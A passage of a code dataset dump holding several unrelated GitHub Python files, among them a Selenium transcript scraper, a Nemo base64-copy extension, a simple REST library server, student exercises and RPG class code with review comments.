vehiculos a 10**vehiculos\ndatos['y'] = 10**datos['y']\ndatos = datos.rename(columns = {\"ds_x\":\"ds\"})\ndatos = datos.sort_values(['ds'])\n\n\"\"\"\"\n#Busco los valores medianos (evitando outliers) de cada hora-dia de la semana\nmedianas = datos.groupby(['dia_semana', 'hora'])[['y']].median().reset_index().rename({'y': 'y_mediana'}, axis = 1)\n\n#Los uno a los datos:\ndatos = datos.merge(medianas, on = ['dia_semana', 'hora'])\ndatos = datos.sort_values(['ds'])\n\n#Calculo la diferencia entre el valor mediano y el valor observado y borro la columna mediana:\ndatos['y_diff_mediana'] = datos.y_mediana - datos.y\ndatos = datos.drop(['y_mediana'], axis = 1)\n\n#Creo variables laggeadas de la diferencia con la mediana de la ultima semana (cada hora):\ndatos_lag = pd.DataFrame()\nfor i in [1, 8, 12, 24, 24*7]:#range(24*7, 0, -1):\n datos_lag['y_diff_mediana_lag_' + str(i)] = datos.y_diff_mediana.shift(i)\ndatos = pd.concat([datos, datos_lag], axis=1)\ndatos.dropna(inplace=True)\n\"\"\"\n\n#Corrijo columnas que tienen \"[\", \"]\":\ndatos.columns = [nombre.replace('[', '(').replace(']', ')') for nombre in datos.columns]\n\n#Corrijo los booleanos a 0/1:\ndatos[datos.select_dtypes(include=['bool']).columns] = datos.select_dtypes(include=['bool']).astype(int)\n\n#Guardo el archivo\ndatos.to_csv(os.path.join('Datos', 'Insumos_python', 'insumo_modelo_1.csv'), index = False)","repo_name":"matiaspoullain/Tesis-maestria","sub_path":"Scripts/Modelos/Modelo_1/estructuracion_datos.py","file_name":"estructuracion_datos.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"71726527217","text":"# raw data files downloaded from http://millionsongdataset.com/musixmatch/\n\nfrom typing import List\n\nimport pandas as pd\n\nfrom dao.dao_mxm_labels import DAOMxmLabels\nfrom dao.dao_sentiment_scores import DAOSentimentScores\nfrom models.mxm_label import MxmLabel\nfrom models.sentiment_score import SentimentScore\n\n\ndef read_data_from_database():\n dao_sentiment_scores: DAOSentimentScores = DAOSentimentScores()\n sentiment_scores: List[SentimentScore] = dao_sentiment_scores.find_all()\n return sentiment_scores\n\n\ndef database_data_to_dataframe():\n sentiment_scores = read_data_from_database()\n headers = sentiment_scores[0].dict().keys()\n sentiment_values = [score.dict().values() for score in sentiment_scores]\n sentiment_df = pd.DataFrame(sentiment_values, columns=headers)\n return sentiment_df\n\n\nif __name__ == '__main__':\n dao_labels: DAOMxmLabels = DAOMxmLabels()\n sentiment_df = database_data_to_dataframe()\n labels = dao_labels.find_all()\n\n for label in labels:\n sentiment_score = sentiment_df[sentiment_df['word'] == label.attr_name]\n if len(sentiment_score) > 0:\n label.sentiment_score = sentiment_score.iloc[0]['sentiment_score']\n dao_labels.update_one(query={\"attr_name\": label.attr_name},\n values={\"$set\": {\"sentiment_score\": int(label.sentiment_score)}})\n else:\n dao_labels.update_one(query={\"attr_name\": label.attr_name}, values={\"$set\": {\"sentiment_score\": 0}})\n","repo_name":"ERoszczyk/music_recommendation","sub_path":"data/0_raw/mxm/mxm_labels_add_sentiment_scores.py","file_name":"mxm_labels_add_sentiment_scores.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"38194542151","text":"import sys\nimport os\nimport time\nimport numpy as np\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nsys.path.append(os.getcwd())\n\nfrom preparation.data_manager import DataManager\nfrom processing.clean import Cleaning\n\nos.environ[\"WDM_SSL_VERIFY\"] = \"0\"\n\n\nclass GobTranscripts:\n\n SLEEP = 1\n DEEP_SLEEP = 3\n WEB_PAGE = \"https://www.congreso.es/busqueda-de-intervenciones\"\n\n def __init__(self, out_dir: str, name: str):\n \"\"\"_summary_\n :param out_dir: _description_\n :type out_dir: str\n :param name: _description_\n :type name: str\n \"\"\"\n options = webdriver.ChromeOptions()\n options.add_argument(\"ignore-certificate-errors\")\n options.add_argument(\"log-level=3\")\n options.add_argument(\"--headless\")\n options.add_argument(\"--window-size=1920,1080\")\n options.add_argument(\"--start-maximized\")\n options.add_argument(\"--disable-dev-shm-usage\")\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-extensions\")\n options.add_argument(\"disable-infobars\")\n options.add_experimental_option(\n \"prefs\", {\"profile.default_content_settings.cookies\": 2}\n )\n self._driver = webdriver.Chrome(\n service=Service(ChromeDriverManager().install()), options=options\n )\n self.transcripts = {}\n self.out_dir = out_dir\n self.name = name\n\n def extract_pdf_transcripts(self):\n \"\"\"_summary_\"\"\"\n try:\n self._driver.get(GobTranscripts.WEB_PAGE)\n self._search(self.name)\n self.transcripts[self.name] = self._get_transcripts()\n while not self._check_last_page():\n self._next_page()\n self.transcripts[self.name] += self._get_transcripts()\n self._write_json()\n self._driver.close()\n self._driver.quit()\n\n except Exception:\n self._driver.close()\n self._driver.quit()\n raise\n\n def _search(self, name: str):\n \"\"\"_summary_\n :param name: _description_\n :type name: str\n \"\"\"\n try:\n input = WebDriverWait(self._driver, GobTranscripts.SLEEP).until(\n EC.presence_of_element_located((By.ID, \"_intervenciones_orador\"))\n )\n input.send_keys(name)\n WebDriverWait(self._driver, GobTranscripts.SLEEP).until(\n EC.element_to_be_clickable(\n (By.ID, \"_intervenciones_resultsShowedIntervenciones\")\n )\n ).click()\n WebDriverWait(self._driver, GobTranscripts.SLEEP).until(\n EC.element_to_be_clickable(\n (By.XPATH, \"//span[contains(text(), 'Buscar')]\")\n )\n ).click()\n time.sleep(GobTranscripts.DEEP_SLEEP)\n except Exception:\n raise\n\n def _check_last_page(self):\n \"\"\"_summary_\"\"\"\n results = (\n WebDriverWait(self._driver, GobTranscripts.SLEEP)\n .until(\n EC.presence_of_element_located(\n (By.ID, \"_intervenciones_resultsShowedIntervenciones\")\n )\n )\n .text\n )\n results = results.split(\" \")\n pages = [word for word in results if word.isnumeric()]\n pages = np.unique(pages)\n if len(pages) == 2:\n return True\n else:\n return False\n\n def _next_page(self):\n \"\"\"_summary_\"\"\"\n WebDriverWait(self._driver, GobTranscripts.SLEEP).until(\n EC.element_to_be_clickable((By.XPATH, \"//a[contains(text(), '>')]\"))\n ).click()\n time.sleep(GobTranscripts.DEEP_SLEEP)\n\n def _get_transcripts(self):\n \"\"\"_summary_\"\"\"\n transcripts = WebDriverWait(self._driver, GobTranscripts.SLEEP).until(\n EC.presence_of_all_elements_located(\n (\n By.XPATH,\n \"//a[contains(@href,'.PDF')]\",\n )\n )\n )\n transcripts = [trans.get_attribute(\"href\") for trans in transcripts]\n return transcripts\n\n def _write_json(self):\n \"\"\"_summary_\n :param name: _description_\n :type name: str\n \"\"\"\n out_file = Cleaning.create_name_file(self.name)\n out_file = self.out_dir + out_file + \".json\"\n DataManager.write_json(out_file, self.transcripts)\n","repo_name":"AlbertoVilla87/web-file","sub_path":"scraper/gob.py","file_name":"gob.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"28795434673","text":"class Solution(object):\n def partition(self, s):\n \"\"\"\n :type s: str\n :rtype: List[List[str]]\n \"\"\"\n if len(s) <= 1:\n return [s]\n result = []\n self.getpartition(s, 0, result, [])\n return result\n\n def getpartition(self, nums, pos, result, temp):\n if pos == len(nums):\n result.append([] + temp)\n for index in range(pos, len(nums)):\n if not self.Palindrome(nums[pos:index + 1]):\n continue\n temp.append(nums[pos:index + 1])\n self.getpartition(nums, index + 1, result, temp)\n temp.pop()\n\n def Palindrome(self, nums):\n if nums is None:\n return None\n if nums == nums[::-1]:\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n index = Solution().partition(\"aab\")\n print(index)","repo_name":"xiaoqiangcs/LeetCode","sub_path":"Partition.py","file_name":"Partition.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"9536605499","text":"#!/usr/bin/env python3\n\nimport os\nimport subprocess\nimport gi\nimport pyperclip\nfrom gi.repository import Nemo, GObject, Gtk, Gdk\n\ngi.require_version('Nemo', '3.0')\n\nclass NemoCopyBase64(GObject.GObject, Nemo.MenuProvider):\n def __init__(self):\n pass\n\n def menu_activate_cb(self, menu, file):\n filepath = file.get_location().get_path()\n base64_content = subprocess.check_output(['base64', '-w', '0', filepath]).decode().strip()\n\n clipboard = Gtk.Clipboard.get(Gdk.SELECTION_CLIPBOARD)\n clipboard.set_text(base64_content, -1)\n clipboard.store()\n\n def get_file_items(self, window, files):\n if len(files) == 1 and not files[0].is_directory():\n item = Nemo.MenuItem(name='NemoCopyBase64::CopyBase64', label='Copy Base64', tip='Copy Base64 representation of the file', icon='edit-paste')\n item.connect('activate', self.menu_activate_cb, files[0])\n return item,\n return\n\nif __name__ == '__main__':\n NemoCopyBase64.register()\n","repo_name":"elias-chacon/nemo-copy-base64","sub_path":"nemo-base64-copy.py","file_name":"nemo-base64-copy.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"5529439061","text":"#111.다음의 csv파일을 book.csv 파일로 생성하시오\nimport csv\n\nfile=open(\"Books.csv\",\"w\")\nfile.write(\" | 제목 | 저자 | 출간연도 |\\n\")#맨위에 각 형식을 잡아줌\nfor i in range(0,5):#5번 입력해야하므로 5번 반복.\n num=(str(i))#출력시 전부 문장화 시켜야하므로, str로 만들어줌.\n n=input(\"enter the book name:\")\n w=input(\"enter the writer name:\")\n d=input(\"enter the year of published:\")\n l1=num+\"_\"+n+\"|\"+w+\"|\"+d+\"\\n\"#하나의 문장으로 만들어줌\n file.write(str(l1))#해당 문장의 형식에 맞게 출력.\nfile.close()\n\nfile=open(\"Books.csv\",\"r\")#파일을 읽기형식으로 연다.\nfor row in file:\n print(row)#한 줄씩 출력.q\nfile.close()\n\n#112.위의 프로그램을 사용자에게 다른 내용의 이름을 요청해 각 행의 한줄에 하나씩 출력.\n#file=list(csv.reader(open(\"Books.csv\")))\n#bk=[]\n#for row in file:\n# bk.append(row)\n#file=open(\"Book.csv\",\"w\")\nc=1\nfor row in bk:\n inp=input(\"enter the another signal:\") \n l2=bk[c][0]+\"|\"+bk[c][1]+\"|\"+bk[c][2]+\"|\"+inp+\"\\n\"\n file.write(l2)\n c=c+1\nfile.close()\n\n#IndexError: list index out of range-> 지정되어있는 리스트의 값보다 큰 값의 리스트 데이터를 요구했을떄 발생하는 문제.\n\nile=open(\"Book.csv\",\"r\")#파일을 읽기형식으로 연다.\nfor row in file:\n print(row)#한 줄씩 출력.\nfile.close()","repo_name":"opuntia88/stud_code","sub_path":"py/book_py_14_test.py","file_name":"book_py_14_test.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"10303301233","text":"from http.server import HTTPServer\r\nfrom http.server import BaseHTTPRequestHandler\r\nimport cgi, json, codecs, requests, time, threading\r\nfrom socketserver import ThreadingMixIn\r\nimport uuid\r\n\r\nbooks = json.loads(open(\"books.json\").read())\r\nauthors = json.loads(open(\"authors.json\").read())\r\nreaders = json.loads(open(\"readers.json\").read())\r\nreadersBooks = json.loads(open(\"readersBooks.json\").read())\r\n\r\ndef commitChanges():\r\n open(\"books.json\", 'w').write(json.dumps(books))\r\n open(\"authors.json\", 'w').write(json.dumps(authors))\r\n open(\"readers.json\", 'w').write(json.dumps(readers))\r\n open(\"readersBooks.json\", 'w').write(json.dumps(readersBooks))\r\n\r\ndef getAllBooks():\r\n return books\r\n\r\ndef getAllBooksForReaderId(readerId):\r\n if not getReaderById(readerId):\r\n return False\r\n\r\n result = []\r\n for readerBook in readersBooks:\r\n if readerId == readerBook['readerId']:\r\n result.append(getBookById(readerBook['bookId']))\r\n return result\r\n\r\ndef getBookForReaderId(readerId, bookId):\r\n if not getReaderById(readerId):\r\n return False\r\n\r\n for readerBook in getAllBooksForReaderId(readerId):\r\n if bookId == readerBook['id']:\r\n return readerBook\r\n return False\r\n\r\ndef getAllBooksForAuthorId(authorId):\r\n if not getAuthorById(authorId):\r\n return False\r\n\r\n result = []\r\n for book in books:\r\n if authorId == book['authorId']:\r\n result.append(book)\r\n return result\r\n\r\ndef getBookForAuthorId(authorId, bookId):\r\n if not getAuthorById(authorId):\r\n return False\r\n\r\n for book in getAllBooksForAuthorId(authorId):\r\n if bookId == book['id']:\r\n return book\r\n return False\r\n\r\ndef getAllReaders():\r\n return readers\r\n\r\ndef getReaderFromBookId(bookId):\r\n for readerBook in readersBooks:\r\n if readerBook['bookId'] == bookId:\r\n return getReaderById(readerBook['readerId'])\r\n return False\r\n\r\ndef getAuthorFromBookId(bookId):\r\n if not getBookById(bookId):\r\n return False\r\n\r\n book = getBookById(bookId)\r\n author = getAuthorById(book['authorId'])\r\n return author\r\n\r\ndef getAllAuthors():\r\n return authors\r\n\r\ndef getBookById(id):\r\n for book in books:\r\n if book['id'] == id:\r\n return book\r\n return False\r\n\r\ndef getAuthorById(id):\r\n for author in authors:\r\n if author['id'] == id:\r\n return author\r\n return False\r\n\r\ndef getReaderById(id):\r\n for reader in readers:\r\n if reader['id'] == id:\r\n return reader\r\n return False\r\n\r\ndef insertBook(name, authorId, genre):\r\n if not getAuthorById(authorId):\r\n return 404\r\n\r\n book = {'id': str(uuid.uuid4()), 'name': name, 'authorId': authorId, 'genre': genre}\r\n books.append(book)\r\n return book\r\n\r\ndef insertReader(name):\r\n reader = {'id': str(uuid.uuid4()), 'name': name}\r\n readers.append(reader)\r\n return reader\r\n\r\ndef insertAuthor(name):\r\n author = {'id': str(uuid.uuid4()), 'name': name}\r\n authors.append(author)\r\n return author\r\n\r\ndef insertReaderBook(readerId, bookId):\r\n if not getBookById(bookId):\r\n return 404\r\n \r\n if not getReaderById(readerId):\r\n return 404\r\n\r\n if getReaderFromBookId(bookId) != False or len(getAllBooksForReaderId(readerId)) > 3:\r\n return 409\r\n \r\n readerBook = {'id': str(uuid.uuid4()), 'readerId': readerId, 'bookId': bookId}\r\n readersBooks.append(readerBook)\r\n return readerBook\r\n\r\ndef deleteReaderById(readerId):\r\n if not getReaderById(readerId):\r\n return False\r\n \r\n for i in range(0, len(readers)):\r\n if readers[i]['id'] == readerId:\r\n readers.pop(i)\r\n break\r\n \r\n for i in range(0, len(readersBooks)):\r\n if readersBooks[i]['readerId'] == readerId:\r\n readersBooks.pop(i)\r\n i -= 1\r\n\r\n return True\r\n\r\ndef deleteBookById(bookId):\r\n if not getBookById(bookId):\r\n return False\r\n \r\n for i in range(0, len(books)):\r\n if books[i]['id'] == bookId:\r\n books.pop(i)\r\n break\r\n \r\n for i in range(0, len(readersBooks)):\r\n if readersBooks[i]['bookId'] == bookId:\r\n readersBooks.pop(i)\r\n i -= 1\r\n\r\n return True\r\n\r\ndef deleteReaderBookById(readerId, bookId):\r\n if not getBookForReaderId(readerId, bookId):\r\n return False\r\n\r\n for i in range(0, len(readersBooks)):\r\n if readersBooks[i]['bookId'] == bookId:\r\n readersBooks.pop(i)\r\n return True\r\n\r\ndef deleteAuthorById(authorId):\r\n if not getAuthorById(authorId):\r\n return False\r\n \r\n for i in range(0, len(authors)):\r\n if authors[i]['id'] == authorId:\r\n authors.pop(i)\r\n break\r\n\r\n if getAllBooksForAuthorId(authorId):\r\n for book in getAllBooksForAuthorId(authorId):\r\n deleteBookById(book['id'])\r\n\r\n return True\r\n\r\ndef updateBook(bookId, data):\r\n if not getBookById(bookId) or not getAuthorById(data['authorId']):\r\n return False\r\n\r\n for i in range(0, len(books)):\r\n if books[i]['id'] == bookId:\r\n books[i]['name'] = data['name']\r\n books[i]['genre'] = data['genre']\r\n books[i]['authorId'] = data['authorId']\r\n return books[i]\r\n\r\ndef updateAuthor(authorId, data):\r\n if not getAuthorById(authorId):\r\n return False\r\n \r\n for i in range(0, len(authors)):\r\n if authors[i]['id'] == authorId:\r\n authors[i]['name'] = data['name']\r\n return authors[i]\r\n\r\ndef bulkInsertReaderBooks(readerId, bookIds):\r\n if len(bookIds) > 3:\r\n return False\r\n\r\n currentReaderBooks = getAllBooksForReaderId(readerId)\r\n\r\n for book in currentReaderBooks:\r\n deleteReaderBookById(readerId, book['id'])\r\n\r\n for bookId in bookIds:\r\n insertReaderBook(readerId, bookId)\r\n return True\r\n \r\n\r\ndef updateReader(readerId, data):\r\n if not getReaderById(readerId):\r\n return False\r\n \r\n for i in range(0, len(readers)):\r\n if readers[i]['id'] == readerId:\r\n readers[i]['name'] = data['name']\r\n if 'books' in data:\r\n if not bulkInsertReaderBooks(readerId,data['books']):\r\n return 409\r\n return readers[i]\r\n\r\ndef splitUrl(path):\r\n if '?' in path:\r\n path = path.split(\"?\")[0]\r\n return path.split('/')[1:]\r\n\r\n\r\nclass RestHTTPRequestHandler(BaseHTTPRequestHandler):\r\n def do_GET(self):\r\n try:\r\n splittedUrl = splitUrl(self.path)\r\n response = 400\r\n\r\n if self.headers['Content-Type'] != 'application/json':\r\n self.send_response(415)\r\n self.end_headers()\r\n return\r\n\r\n if splittedUrl[0] == 'readers':\r\n if len(splittedUrl) == 1:\r\n response = getAllReaders()\r\n if len(response) == 0:\r\n response = 204\r\n elif len(splittedUrl) == 2:\r\n response = getReaderById(splittedUrl[1])\r\n elif len(splittedUrl) == 3 and splittedUrl[2] == 'books':\r\n response = getAllBooksForReaderId(splittedUrl[1])\r\n if len(response) == 0:\r\n response = 204\r\n elif len(splittedUrl) == 4 and splittedUrl[2] == 'books':\r\n response = getBookForReaderId(splittedUrl[1], splittedUrl[3])\r\n\r\n elif splittedUrl[0] == 'books':\r\n if len(splittedUrl) == 1:\r\n response = getAllBooks()\r\n if len(response) == 0:\r\n response = 204\r\n if len(splittedUrl) == 2:\r\n response = getBookById(splittedUrl[1])\r\n if len(splittedUrl) == 3 and splittedUrl[2] == 'reader':\r\n response = getReaderFromBookId(splittedUrl[1])\r\n if len(response) == 0:\r\n response = 204\r\n if len(splittedUrl) == 3 and splittedUrl[2] == 'author':\r\n response = getAuthorFromBookId(splittedUrl[1])\r\n\r\n elif splittedUrl[0] == 'authors':\r\n if len(splittedUrl) == 1:\r\n response = getAllAuthors()\r\n if len(response) == 0:\r\n response = 204\r\n if len(splittedUrl) == 2:\r\n response = getAuthorById(splittedUrl[1])\r\n if len(splittedUrl) == 3 and splittedUrl[2] == 'books':\r\n response = getAllBooksForAuthorId(splittedUrl[1])\r\n if len(response) == 0:\r\n response = 204\r\n if len(splittedUrl) == 4 and splittedUrl[2] == 'books':\r\n response = getBookForAuthorId(splittedUrl[1], splittedUrl[3])\r\n\r\n if response == 400 or response == 204:\r\n self.send_response(204)\r\n self.end_headers()\r\n return\r\n if not response:\r\n self.send_response(404)\r\n self.end_headers()\r\n return\r\n else:\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(json.dumps(response).encode())\r\n return\r\n except:\r\n self.send_response(500)\r\n self.end_headers()\r\n return\r\n\r\n def do_POST(self):\r\n try:\r\n response = 400\r\n splittedUrl = splitUrl(self.path)\r\n data = json.loads(self.rfile.read(int(self.headers['Content-Length'])))\r\n\r\n if self.headers['Content-Type'] != 'application/json':\r\n self.send_response(415)\r\n self.end_headers()\r\n return\r\n\r\n if splittedUrl[0] == 'readers':\r\n if len(splittedUrl) == 1:\r\n if not 'name' in data:\r\n response = 400\r\n else:\r\n response = insertReader(data['name'])\r\n elif len(splittedUrl) == 4 and splittedUrl[2] == 'books':\r\n response = insertReaderBook(splittedUrl[1], splittedUrl[3])\r\n elif splittedUrl[0] == 'books':\r\n if len(splittedUrl) == 1:\r\n if not 'name' in data or not 'authorId' in data or not 'genre' in data:\r\n response = 400\r\n else:\r\n response = insertBook(data['name'], data['authorId'], data['genre'])\r\n elif splittedUrl[0] == 'authors':\r\n if len(splittedUrl) == 1:\r\n if not 'name' in data:\r\n response = 400\r\n else:\r\n response = insertAuthor(data['name'])\r\n if len(splittedUrl) == 3 and splittedUrl[2] == 'books':\r\n if not 'name' in data or not 'genre' in data:\r\n response = 400\r\n else:\r\n response = insertBook(data['name'], splittedUrl[1], data['genre'])\r\n\r\n if response == 409 or response == 404 or response == 400:\r\n self.send_response(response)\r\n self.end_headers()\r\n return\r\n else:\r\n self.send_response(201)\r\n self.end_headers()\r\n self.wfile.write(json.dumps(response).encode())\r\n commitChanges()\r\n return\r\n except:\r\n self.send_response(500)\r\n self.end_headers()\r\n return\r\n\r\n def do_PUT(self):\r\n try:\r\n response = 400\r\n splittedUrl = splitUrl(self.path)\r\n data = json.loads(self.rfile.read(int(self.headers['Content-Length'])))\r\n\r\n if self.headers['Content-Type'] != 'application/json':\r\n self.send_response(415)\r\n self.end_headers()\r\n return\r\n\r\n if len(splittedUrl) == 2 and splittedUrl[0] == 'readers':\r\n if not 'name' in data:\r\n response = 400\r\n else:\r\n response = updateReader(splittedUrl[1], data)\r\n elif len(splittedUrl) == 2 and splittedUrl[0] == 'books':\r\n if not 'name' in data or not 'authorId' in data or not 'genre' in data:\r\n response = 400\r\n else:\r\n response = updateBook(splittedUrl[1], data)\r\n elif len(splittedUrl) == 2 and splittedUrl[0] == 'authors':\r\n if not 'name' in data:\r\n response = 400\r\n else:\r\n response = updateAuthor(splittedUrl[1], data)\r\n\r\n if response == 400:\r\n self.send_response(400)\r\n self.end_headers()\r\n return\r\n if response == 409:\r\n self.send_response(409)\r\n self.end_headers()\r\n return\r\n if not response:\r\n self.send_response(404)\r\n self.end_headers()\r\n return\r\n else:\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(json.dumps(response).encode())\r\n commitChanges()\r\n return\r\n except:\r\n self.send_response(500)\r\n self.end_headers()\r\n return\r\n\r\n def do_DELETE(self):\r\n try:\r\n response = 400\r\n splittedUrl = splitUrl(self.path)\r\n\r\n if self.headers['Content-Type'] != 'application/json':\r\n self.send_response(415)\r\n self.end_headers()\r\n return\r\n\r\n if len(splittedUrl) == 2 and splittedUrl[0] == 'readers':\r\n response = deleteReaderById(splittedUrl[1])\r\n elif len(splittedUrl) == 2 and splittedUrl[0] == 'books':\r\n response = deleteBookById(splittedUrl[1])\r\n elif len(splittedUrl) == 4 and splittedUrl[0] == 'readers' and splittedUrl[2] == 'books':\r\n response = deleteReaderBookById(splittedUrl[1], splittedUrl[3])\r\n elif len(splittedUrl) == 2 and splittedUrl[0] == 'authors':\r\n response = deleteAuthorById(splittedUrl[1])\r\n \r\n if response == 400:\r\n self.send_response(400)\r\n self.end_headers()\r\n return\r\n if not response:\r\n self.send_response(404)\r\n self.end_headers()\r\n return\r\n else:\r\n self.send_response(204)\r\n self.end_headers()\r\n commitChanges()\r\n return\r\n except:\r\n self.send_response(500)\r\n self.end_headers()\r\n return\r\n\r\n\r\n\r\nclass ThreadedHTTPServer(ThreadingMixIn, HTTPServer):\r\n pass\r\n\r\nhttpd = ThreadedHTTPServer(('0.0.0.0', 8000), RestHTTPRequestHandler)\r\nhttpd.serve_forever()","repo_name":"GabrielS5/CloudComputing","sub_path":"Tema2/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":15094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"37889251364","text":"import random\nclass Warrior:\n def __init__(self, health, stamina):\n self.__health = health\n self.__stamina = stamina\n\n @property\n def health(self):\n return self.__health\n\n @health.setter\n def health(self, new_health):\n if new_health > 100: # проверяем \"новое здоровье\", а не \"старое\"\n self.__health = 100\n elif new_health < 0:\n self.__health = 0\n else:\n self.__health = new_health\n\n\n @property\n def stamina(self):\n return self.__stamina\n\n\n @stamina.setter\n def stamina(self, new_stamina):\n self.__stamina = new_stamina\n\n def introduces(self):\n print(\"-----------\")\n print(f'Class: {self.__class__.__name__}',\n f'\\nHealth: {self.__health}',\n f'\\nStamina: {self.__stamina}')\n print('-----------')\n\n\n def heal(self, target):\n if self.__stamina >=20:\n print('-----------')\n print(f'{self.__class__.__name__} bandage with herbs on '\n f'{target.__class__.__name__}')\n target._set_health(10)\n self.__stamina -= 20\n print(f'Health of {target.__class__.__name__} upgraded to {target._get_health()}',\n f'\\nNow {self.__class__.__name__} have only {self.__stamina} stamina')\n print('------------')\n else:\n print(\"Not enough stamina for ths action\")\n\n\n def attacks(self, target):\n if target.health >= 3:\n print('-----------')\n print(f'{self.__class__.__name__} attack {target.__class__.__name__} with sword ')\n target._set_health(-3)\n print(f'Health of {target.__class__.__name__} lowed to {target._get_health()}')\n print('------------')\n else:\n print(self.__class__.__name__, \"makes final punch and kills\", target.__class__.__name__)\n\n\nclass Mage:\n def __init__(self, health, mana): # не надо ставить __ в параметрах\n self.health = health # здесь будет просто health, mana\n self.mana = mana\n\n @property\n def health(self):\n return self.__health # а вот тут __health\n\n @health.setter\n def health(self, new_health):\n if new_health > 60: # тут тоже проверяется new_health\n self.__health = 60\n if new_health < 0:\n self.__health = 0\n else:\n self.__health = new_health\n\n\n def introducesMage(self):\n print(\"-----------\")\n print(f'Class: {self.__class__.__name__}',\n f'\\nHealth: {self.__health}',\n f'\\nmana: {self.__mana}')\n print('-----------')\n\n def heal(self, target):\n if self.__mana >= 20:\n print('-----------')\n print(f'{self.__class__.__name__} casts a heal spell on '\n f'{target.__class__.__name__}')\n target._set_health(10)\n self.__mana -= 20\n print(f'Health of {target.__class__.__name__} upgraded to {target._get_health()}',\n f'\\nNow {self.__class__.__name__} have only {self.__mana} mana')\n print('------------')\n else:\n print(\"Not enough mana for this action\")\n\n def attacks(self, target):\n if target._get_health() >= 3:\n print('-----------')\n print(f'{self.__class__.__name__} attack {target.__class__.__name__} with magic ')\n target._set_health(-3)\n print(f'Health of {target.__class__.__name__} lowed to {target._get_health()}')\n print('------------')\n else:\n print(self.__class__.__name__, \"makes final punch and kills\", target.__class__.__name__)\n\n\nclass Knight(Warrior):\n def __init__(self, health=100, armor=100, stamina=100, arrows=20): # тут не ставим __\n super().__init__(health, stamina) # тут есть смысл вызвать конструктор класса-родителя, чтобы не повтрять код\n self.__armor = armor\n self.__arrows = arrows\n\n # Если ты хочешь новые переменные создать, то\n # сперва опиши их в конструкторе!\n\n #def _get_armor(self):\n # return self.armor\n\n\n #def _get_barrier(self):\n # return self.barrier\n\n\n # Сеттер и геттер уже есть в классе родителя\n #def _get_health(self):\n # return self.__health\n\n #def _set_health(self, points):\n # if self.armor <= points:\n # print(self.__class__.__name__)\n # elif self.armor > 0:\n # if points <= 0:\n # self.armor += points\n # else:\n # self.__health += points\n\n # if self.__health > 60:\n # self.__health = 60\n # if self.__health < 0:\n # self.__health = 0\n\n # Этот метод тоже есть у родителя\n #def heal(self, target):\n # if self.__stamina >= 20:\n # print('-----------')\n # print(f'{self.__class__.__name__} bandage with herbs on '\n # f'{target.__class__.__name__}')\n # target._set_health(10)\n # self.__stamina -= 20\n # print(f'Health of {target.__class__.__name__} upgraded to {target._get_health()}',\n # f'\\nNow {self.__class__.__name__} have only {self.__stamina} stamina')\n # print('------------')\n # else:\n # print(\"Not enough stamina for this action\")\n\n\n # А вот тут очень хорошо!\n def attacs(self, target):\n chance = random.randint(1, 100)\n if chance <= 40:\n print('-----------')\n print(f'{self.__class__.__name__} attack {target.__class__.__name__} with sword and makes critical hit ')\n target.__health -= 10\n if target.__class__.__name__ == 'Wizard':\n print(f'Health of {target.__class__.__name__} lowed to {target._get_health()}')\n print(f'Health of {target.__class__.__name__} lowed to {target._get_health()}')\n print('------------')\n elif chance >= 41:\n print('-----------')\n print(f'{self.__class__.__name__} attack {target.__class__.__name__} with sword ')\n target.__health -= 3\n if target.__class__.__name__ == 'Wizard':\n print(f'Health of {target.__class__.__name__} lowed to {target._get_health()}')\n print(f'Health of {target.__class__.__name__} lowed to {target._get_health()}')\n print('------------')\n else:\n print(self.__class__.__name__, \"makes final punch and kills\", target.__class__.__name__)\n\n\nclass Wizard(Mage):\n def __init__(self, health=50, barrier=100, mana=100):\n # Обычно первым вызывается родительский конструктор\n super().__init__(health, mana)\n self.__barrier = barrier\n\n\n def _get_barrier(self):\n return self.__barrier\n\n # Уже есть у родителя\n #@property\n #def health(self):\n # return self.__health\n\n\n # У класса Mage нет stamina. Надо переписать этот метод:\n #def heal(self, target):\n # if self.__sta >= 20:\n ## print('-----------')\n # print(f'{self.__class__.__name__} casts a heal spell on '\n # f'{target.__class__.__name__}')\n # target._set_health(10)\n # self.__stamina -= 20\n # print(f'Health of {target.__class__.__name__} upgraded to {target._get_armor}',\n # f'\\nNow {self.__class__.__name__} have only {self.__stamina} stamina')\n ## print('------------')\n # else:\n # print(\"Not enough stamina for this action\")\n\n # Можно определить это в родительском классе\n #def attacks(self, target):\n # chance = random.randint(1, 100)\n # if chance <= 20:\n # print('-----------')\n # print(f'{self.__class__.__name__} attack {target.__class__.__name__} with magic and summon fire ball ')\n # target._set_health(-15) # нет сеттера - будет ошибка\n # if target.__class__.__name__ == 'Knight':\n # print(f'Armor of {target.__class__.__name__} lowed to {target._get_armor()}')\n # print(f'Health of {target.__class__.__name__} lowed to {target._get_health()}')\n # print('------------')\n # elif chance >= 21:\n # print('-----------')\n # print(f'{self.__class__.__name__} attack {target.__class__.__name__} with magic ')\n # target._set_health(-3) # аналогично - нет этого сеттера\n # if target.__class__.__name__ == 'Knight':\n # pass\n # #print(f'Armor of {target.__class__.__name__} lowed to {target._get_armor()}')\n # print(f'Health of 